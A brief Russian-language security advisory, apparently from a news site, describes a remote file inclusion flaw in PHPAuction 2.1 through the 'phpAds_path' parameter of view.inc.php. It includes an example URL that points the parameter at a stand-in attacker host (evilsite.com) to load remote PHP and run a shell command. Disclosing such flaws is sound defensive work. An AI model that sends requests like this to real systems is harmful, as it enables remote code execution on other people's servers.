Программа: PHPAuction 2.1

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре "phpAds_path" в
сценарии iew.inc.php.

Пример:

http://target/phpAdsNew/view.inc.php?phpAds_path=http://evilsite.com/dblib.php/cmd=ls



Оставить мнение